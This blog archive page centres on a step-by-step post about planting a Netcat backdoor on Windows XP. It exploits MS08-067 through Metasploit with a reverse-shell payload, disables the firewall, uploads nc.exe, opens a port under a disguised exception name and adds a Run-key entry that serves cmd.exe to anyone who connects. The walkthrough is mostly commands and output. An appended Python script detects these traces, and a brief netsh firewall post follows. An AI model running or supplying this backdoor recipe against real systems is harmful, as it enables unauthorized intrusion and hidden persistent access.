Archive for the ‘FireWall’ Category

control – windows firewall from the command line

June 7, 2012

Creating a Netcat Backdoor on a Windows XP

June 6, 2012 (2 comments)


Netcat is a versatile tool that can perform a multitude of TCP/IP functions. One feature that is particularly useful to a penetration tester is its ability to shovel a shell from one system to another. In this post we use that feature to plant a remote backdoor on a Windows XP system whose firewall is ON. A backdoor is a communication channel that gives us a remote command shell on a previously exploited system (the victim), so that we can get back into it later. Below I demonstrate how to create and use such a backdoor on a Windows XP victim with the firewall enabled.

Run the Metasploit console:

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 869 exploits - 480 auxiliary - 144 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
       =[ svn r15401 updated today (2012.06.07)

Scan the target with nmap (run from the msf console):

msf > nmap
[*] exec: nmap
Nmap scan report for
Host is up (0.00s latency).
Not shown: 998 filtered ports    # the firewall is on; only its File and Printer Sharing exceptions answer
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds    # OPEN: this is the port MS08-067 needs

Choose an exploit for the target (Windows XP EN SP2)

Microsoft Server Service Relative Path Stack Corruption (exploit/windows/smb/ms08_067_netapi), in the module's own words:

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show targets
Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   6   Windows XP SP3 English (NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)

Choose a payload for the target (Windows XP EN SP2)

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST
msf  exploit(ms08_067_netapi) > set LHOST

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port    # this port is open
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Exploit (Windows XP EN SP2)

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2012-06-07 13:28:59 +0200


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   # SYSTEM !!!!!
meterpreter > shell
Process 240 created.
Channel 1 created.

Running a shell on the Windows XP host and disabling the firewall:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>Netsh firewall set opmode disable         # disable the firewall
Netsh firewall set opmode disable
Ok.                                                           # Ok: the firewall is now OFF

Next, back in meterpreter, upload netcat to the Windows XP host:

meterpreter > upload c:\\tools\\nc.exe c:\\windows\\system32\\   # upload netcat from my attacking machine to the XP host
[*] uploading  : c:\tools\nc.exe -> c:\windows\system32\
[*] uploaded   : c:\tools\nc.exe -> c:\windows\system32\\nc.exe   # upload status: Ok

meterpreter > shell
Process 976 created.
Channel 3 created.

Open a new TCP port (1234) through the firewall

The Standard profile (the one in use off-domain) is still disabled from the previous step, so first check the state, re-enable the firewall with exceptions allowed, and then add a single port exception rather than leaving the firewall switched off:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode          # show firewall status
netsh firewall show opmode

Domain profile configuration:
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
Operational mode                  = Disable               # the profile in use: firewall is OFF
Exception mode                    = Enable

Local Area Connection firewall configuration:
Operational mode                  = Enable

C:\WINDOWS\system32>Netsh firewall set opmode mode = enable exceptions = enable profile = all
Netsh firewall set opmode mode = enable exceptions = enable profile = all
Ok.     # firewall is ON again and exceptions are allowed

C:\WINDOWS\system32>netsh firewall add portopening TCP 1234 "Windows Firewall Reporting Agent" enable all
netsh firewall add portopening TCP 1234 "Windows Firewall Reporting Agent" enable all
Ok.     # TCP 1234 is open, under an innocuous-looking exception name

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting   # the port we just opened
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Install the backdoor shell (persistence through the Run key)

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

The operation completed successfully  # It's OK!



From now on, each time a user logs on, the Run key starts Netcat, which listens on TCP 1234 and hands a command prompt to whoever connects. Two caveats: the listener runs in the context of the user who logged on, not as SYSTEM (the prompt in the test below lands in that user's profile directory), and with -l Netcat exits once the first client disconnects, so the shell is gone until the next logon; the Windows build's -L option re-listens after each connection.

The autorun entry is plainly visible to anyone who looks:

wmic:root\cli>startup list full
Command=c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe  # not hidden
User=All Users

Does it work?

From another machine, run:

c:\tools>nc -v 1234
CASH-F32CDFF50A [] 1234 (?) open

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\metasploit>

It works!
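As an added example (my own code, not from the post), here is a small Python audit that reads the text output of the three commands used above, netsh firewall show opmode, netsh firewall show portopening and wmic startup list full, and flags exactly the traces this backdoor leaves: a profile whose firewall is Off, an enabled port exception outside the XP SP2 File and Printer Sharing baseline, and a Run entry that starts nc with -l/-L and -e. The embedded transcripts are constructed after the session above (the ctfmon entry is filler), and the baseline port set, the regular expressions and the function names are my assumptions, not anything netsh or the post defines.

```python
import re

# XP SP2's default File and Printer Sharing exceptions (the rows beside 1234 in the post).
BASELINE_PORTS = {("TCP", 139), ("TCP", 445), ("UDP", 137), ("UDP", 138)}
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}

# Constructed sample transcripts shaped after the post's session; ctfmon is benign filler.
SAMPLE_OPMODE = """\
Standard profile configuration (current):
Operational mode                  = Enable
Exception mode                    = Enable
Local Area Connection firewall configuration:
Operational mode                  = Enable
"""
SAMPLE_PORTOPENING = """\
Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting Agent
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
"""
SAMPLE_STARTUP = """\
Caption=ctfmon.exe
Command=C:\\WINDOWS\\system32\\ctfmon.exe
Location=HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Caption=nc
Command=c:\\windows\\system32\\nc.exe -d -l -p1234 -e cmd.exe
Location=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
"""

HEADER_RE = re.compile(r"^(.+?) (?:profile|firewall) configuration(?: \(current\))?:$")
MODE_RE = re.compile(r"^(Operational|Exception) mode\s*=\s*(Enable|Disable)$")
RULE_RE = re.compile(r"^(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\s+(.+?)\s*$")
PORT_RE = re.compile(r"-p ?(\d+)")  # netcat's -p1234 or -p 1234

def parse_opmode(text):
    """`netsh firewall show opmode` -> {profile: {"operational": bool, "exceptions": bool}}."""
    profiles, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if m := HEADER_RE.match(line):
            current = m.group(1)
            profiles[current] = {}
        elif (m := MODE_RE.match(line)) and current is not None:
            key = "operational" if m.group(1) == "Operational" else "exceptions"
            profiles[current][key] = m.group(2) == "Enable"
    return profiles

def gui_state(modes):
    """The General-tab choice (Off / On / On without exceptions) a profile's modes correspond to."""
    if not modes.get("operational"):
        return "Off"
    return "On (don't allow exceptions)" if modes.get("exceptions") is False else "On"

def parse_portopening(text):
    """`netsh firewall show portopening` rows as dicts; the header row does not match RULE_RE."""
    return [{"port": int(m.group(1)), "protocol": m.group(2),
             "enabled": m.group(3) == "Enable", "name": m.group(4)}
            for m in map(RULE_RE.match, (raw.strip() for raw in text.splitlines())) if m]

def parse_startup(text):
    """`wmic startup list full` output: blank-line separated key=value blocks, one dict each."""
    entries, current = [], {}
    for line in (raw.strip() for raw in text.splitlines() + [""]):
        if line:
            key, _, value = line.partition("=")
            current[key] = value
        elif current:
            entries.append(current)
            current = {}
    return entries

def is_netcat_bind_shell(command):
    """True for nc/ncat run with -l or -L plus -e (flags as separate tokens, as in the post)."""
    tokens = command.split() or [""]
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()
    return exe in NETCAT_NAMES and any(a in ("-l", "-L") for a in tokens) and "-e" in tokens

def audit(opmode_text, portopening_text, startup_text):
    """Human-readable findings; an empty list means none of the post's traces were found."""
    findings = []
    for name, modes in parse_opmode(opmode_text).items():
        if gui_state(modes) == "Off":
            findings.append(f"firewall Off on {name}")
    opened = {}  # (protocol, port) -> exception name, to correlate with listeners
    for rule in parse_portopening(portopening_text):
        if rule["enabled"]:
            key = (rule["protocol"], rule["port"])
            opened[key] = rule["name"]
            if key not in BASELINE_PORTS:
                findings.append(f"non-baseline exception {key[0]}/{key[1]} named '{rule['name']}'")
    for entry in parse_startup(startup_text):
        cmd = entry.get("Command", "")
        if is_netcat_bind_shell(cmd):
            msg = f"netcat bind shell in startup ({entry.get('Location', '?')}): {cmd}"
            port = PORT_RE.search(cmd)
            key = ("TCP", int(port.group(1))) if port else None
            if key in opened:
                msg += f" [matches firewall exception '{opened[key]}']"
            findings.append(msg)
    return findings
```

Run the three commands on the host, feed their output to audit() in place of the sample strings, and treat an empty list as the clean case. The correlation at the end is the telling part: a fresh exception whose port matches a startup listener is precisely the pattern this post creates, whatever name the exception was given.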


Categories: BackDoor, FireWall

Using Netsh with Windows XP And Windows 2003 Firewall

March 11, 2012 (1 comment)


This post examines how to configure Windows Firewall with the Netsh command-line utility. The procedures apply to both Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1.

Windows XP SP2 (and Windows Server 2003 SP1) includes Windows Firewall, the replacement for the feature previously known as the Internet Connection Firewall (ICF). Windows Firewall is a stateful host firewall: it drops all unsolicited incoming traffic, that is, anything that is neither a response to a request the computer sent nor unsolicited traffic explicitly allowed as an exception.

Configuring Windows Firewall from the command line, step by step


The default settings are shown in the following figure.

[Figure: Windows Firewall, General tab]

  • On (recommended)
    Select to enable Windows Firewall for all of the network connections that are selected on the Advanced tab. Windows Firewall is enabled to allow only solicited and excepted incoming traffic. Excepted traffic is configured on the Exceptions tab.
  • Don’t allow exceptions
    Click to allow only solicited incoming traffic. Excepted incoming traffic is not allowed. The settings on the Exceptions tab are ignored and all of the network connections are protected, regardless of the settings on the Advanced tab.
  • Off (not recommended)
    Select to disable Windows Firewall. This is not recommended, especially for network connections that are directly accessible from the Internet, unless you are already using a third-party host firewall product.
